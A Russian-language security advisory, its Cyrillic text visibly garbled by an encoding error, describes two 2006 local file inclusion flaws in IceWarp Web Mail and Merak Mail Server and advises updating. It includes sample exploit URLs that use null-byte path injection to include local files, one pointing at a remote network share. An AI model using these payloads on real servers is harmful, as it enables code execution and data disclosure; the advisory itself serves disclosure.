»нклюдинг локальных файлов в IceWarp Web Mail

ƒата публикации:
17.07.2006
ƒата изменени€:
29.12.2008
¬сего просмотров:
1897
ќпасность:
¬ысока€
Ќаличие исправлени€:
ƒа
 оличество у€звимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-0817
CVE-2006-0818
¬ектор эксплуатации:
”даленна€
¬оздействие:
–аскрытие важных данных
 омпрометаци€ системы
CWE ID:
Ќет данных
Ќаличие эксплоита:
Ќет данных
”€звимые продукты:
Merak Mail Server 8.x
IceWarp Web Mail 5.x
”€звимые версии:
Merak Mail Server 8.3.8.r c IceWarp Web Mail 5.6.0, возможно другие версии.

ќписание:
”€звимость позвол€ет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

1. ”€звимость существует из-за недостаточной обработки входных данных в параметрах "language" и "lang_settings" в функции "securepath()" в сценари€х "/accounts/inc/include.php" и "/admin/inc/include.php". ”даленный пользователь может внедрить PHP кодв лог файл и затем выполнить его выполнить, указав полный путь к файлу на Windows системе. ѕример:

http://[host]:32000/admin/inc/include.php?language=0&lang_settings[0][1]=c:\[file]%00

2. ”€звимость существует из-за недостаточной обработки входных данных в параметре "language" в сценарии "/mail/settings.html" перед записью данных в базу данных. ”даленный пользователь может переписать значение переменной "lang_settings" и подключить произвольные файлы на локальной системе. ƒл€ удачной эксплуатации у€звимости требуетс€ валидна€ учетна€ запись. ѕример:

http://[host]:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST
http://[host]:32000/mail/index.html?id=[curent_id]&lang_settings[TEST]=test;&lang_settings[TEST]=test;c:\[file]%00;
http://[host]:32000/mail/index.html?id=[curent_id]&lang_settings[TEST]=test;&lang_settings[TEST]=test;\\[host]\[share]\[file]%00;

URL производител€: www.icewarp.com/Products/IceWarp_Web_Mail/

–ешение: ”становите последнюю версию с сайта производител€.

—сылки: IceWarp Web Mail Two File Inclusion Vulnerabilities

или введите им€

CAPTCHA